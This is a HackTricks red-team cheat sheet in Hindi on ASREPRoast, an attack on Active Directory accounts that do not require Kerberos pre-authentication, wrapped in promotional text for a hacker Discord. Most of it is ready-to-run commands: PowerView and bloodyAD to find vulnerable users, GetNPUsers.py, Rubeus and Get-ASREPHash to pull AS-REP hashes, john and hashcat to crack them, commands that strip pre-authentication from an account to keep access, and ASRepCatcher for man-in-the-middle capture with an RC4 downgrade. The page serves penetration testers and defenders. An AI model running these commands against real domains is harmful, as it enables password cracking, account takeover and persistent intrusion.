ASREPRoast

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

दूसरे तरीके HackTricks का समर्थन करने के लिए:

HackenProof Discord सर्वर में शामिल होकर अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!

हैकिंग इंसाइट्स उस सामग्री के साथ जुड़ें जो हैकिंग के रोमांच और चुनौतियों में डूबती है

रियल-टाइम हैक न्यूज़ तेजी से बदलती हैकिंग दुनिया के साथ कदम से कदम रहें अपडेट के साथ

नवीनतम घोषणाएं नवीनतम बग बाउंटी लॉन्च और महत्वपूर्ण प्लेटफॉर्म अपडेट के साथ सूचित रहें

हमारे साथ जुड़ें Discord और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!

ASREPRoast

ASREPRoast एक सुरक्षा हमला है जो उन उपयोगकर्ताओं का शोषण करता है जिनके पास Kerberos पूर्व-प्रमाणीकरण आवश्यक विशेषता नहीं है। मुख्य रूप से, यह दुर्बलता हमला हैकर्स को उपयोगकर्ता के लिए डोमेन कंट्रोलर (DC) से प्रमाणीकरण का अनुरोध करने की अनुमति देता है बिना उपयोगकर्ता के पासवर्ड की आवश्यकता के। फिर DC उपयोगकर्ता के पासवर्ड से निर्धारित कुंजी से एन्क्रिप्ट किए गए संदेश के साथ प्रतिक्रिया करता है, जिसे हैकर्स ऑफलाइन क्रैक करने की कोशिश कर सकते हैं ताकि वे उपयोगकर्ता का पासवर्ड खोज सकें।

इस हमले के मुख्य आवश्यकताएँ हैं:

  • Kerberos पूर्व-प्रमाणीकरण की कमी: लक्षित उपयोगकर्ताओं को इस सुरक्षा सुविधा को सक्रिय करने की आवश्यकता नहीं है।

  • डोमेन कंट्रोलर (DC) से कनेक्शन: हैकर्स को DC तक पहुंचने की आवश्यकता है ताकि वे अनुरोध भेज सकें और एन्क्रिप्टेड संदेश प्राप्त कर सकें।

  • वैकल्पिक डोमेन खाता: डोमेन खाता होने से हैकर्स को LDAP क्वेरी के माध्यम से विकल्पित उपयोगकर्ताओं की पहचान करने में अधिक सक्षम होता है। इस तरह के खाते के बिना, हैकर्स को उपयोगकर्ता नामों का अनुमान लगाना होगा।

विकल्पी उपयोगकर्ताओं की गणना (डोमेन क्रेडेंशियल्स की आवश्यकता है)

Windows का उपयोग करके
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
लिनक्स का उपयोग करना
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName

AS_REP संदेश का अनुरोध करें

Linux का उपयोग करें
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
Windows का उपयोग करना
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

AS-REP Roasting के साथ Rubeus का उपयोग करने पर एक 4768 उत्पन्न होगा जिसमें एन्क्रिप्शन प्रकार 0x17 और पूर्व-प्रमाणीकरण प्रकार 0 होगा।

क्रैकिंग

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

स्थिरता

एक उपयोगकर्ता के लिए GenericAll अनुमतियों (या गुणों को लिखने की अनुमति) होने पर preauth को अनिवार्य न करें:

Windows का उपयोग करना
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
लिनक्स का उपयोग करना
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH

क्रेडेंशियल के बिना ASREProast

एक हमलावर एक मैन-इन-द-मिडिल स्थिति का उपयोग कर सकता है ताकि AS-REP पैकेट को जाल से गुजरते हुए पकड़ सके के बिना करबेरोस पूर्व-प्रमाणीकरण पर निर्भरता करने की आवश्यकता न हो। इसलिए यह सभी उपयोगकर्ताओं के लिए VLAN पर काम करता है। ASRepCatcher हमें इसे करने की अनुमति देता है। इसके अतिरिक्त, यह उपकरण करबेरोस बातचीत को बदलकर क्लाइंट वर्कस्टेशन को RC4 का उपयोग करने के लिए मजबूर करता है।

# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP

# Disabling ARP spoofing, the mitm position must be obtained differently
ASRepCatcher relay -dc $DC_IP --disable-spoofing

# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen

संदर्भ


HackenProof Discord सर्वर में शामिल होकर अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!

हैकिंग इंसाइट्स हैकिंग के रोमांच और चुनौतियों में डूबने वाली सामग्री के साथ जुड़ें

रियल-टाइम हैक न्यूज़ रियल-टाइम समाचार और अंदरूनी दुनिया के साथ अप-टू-डेट रहें

नवीनतम घोषणाएं नवीनतम बग बाउंटी लॉन्च और महत्वपूर्ण प्लेटफॉर्म अपडेट के साथ सूचित रहें

हमारे साथ जुड़ें Discord और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated